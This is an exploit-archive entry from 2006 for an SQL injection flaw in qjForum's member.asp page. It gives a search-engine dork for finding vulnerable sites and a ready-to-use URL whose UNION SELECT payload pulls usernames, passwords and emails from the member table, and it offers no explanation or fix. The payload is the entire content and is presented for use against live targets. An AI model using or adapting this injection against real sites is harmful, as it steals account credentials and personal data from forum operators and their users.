[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : qjForum (member.asp) SQL Injection Vulnerability
# Published : 2006-05-26
# Author : ajann
# Previous Title : Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability
# Next Title : Guestex Guestbook 1.00 (email) Remote Code Execution Exploit
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# greetz : Nukedx,TheHacker
# Dork : "qjForum"
# Exploit:
# Login before injection.
### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
# www.Syue.com [2006-05-26]